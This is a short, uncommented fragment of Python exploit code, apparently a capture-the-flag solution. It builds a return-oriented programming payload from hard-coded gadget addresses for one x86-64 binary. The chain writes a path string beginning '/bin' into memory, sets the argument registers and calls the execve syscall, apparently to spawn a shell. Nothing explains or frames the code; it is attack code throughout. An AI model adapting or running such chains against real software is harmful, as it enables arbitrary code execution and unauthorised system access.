payload = p64(0x40ddbf)
#0x40ddbf: pop rax ; retf
payload += p64(0xffffffffff5f106b)+p32(0x41f07e)+p32(0x33)
# 0x000000000041f07e: pop rcx; ret 0; 
payload += p64(0x6e69622f)+p64(0x41cf04)
# 0x000000000041cf04: add dword ptr [rax + 0xe3c005], ecx; add cl, ch; ret; 
payload += p64(0x40ddbf)
# 0x40ddbf: pop rax ; retf
payload += p64(0xffffffffff5f106f)+p32(0x41f07e)+p32(0x33)
# 0x000000000041f07e: pop rcx; ret 0; 
payload += p64(0x68662f)+p64(0x41cf04)
# 0x000000000041cf04: add dword ptr [rax + 0xe3c005], ecx; add cl, ch; ret; 
payload += p64(0x40ddbf)
# 0x40ddbf: pop rax ; retf
payload += p64(0x0)+p32(0x41efc0)+p32(0x33)
# 0x000000000041efc0: cdq; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x42d070)+p64(0x40ddbf)
# 0x40ddbf: pop rax ; retf
payload += p64(0x3b)+p32(0x4017d1)+p32(0x33)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x41ec0c)
# 0x000000000041ec0c: syscall; 
payload += b''
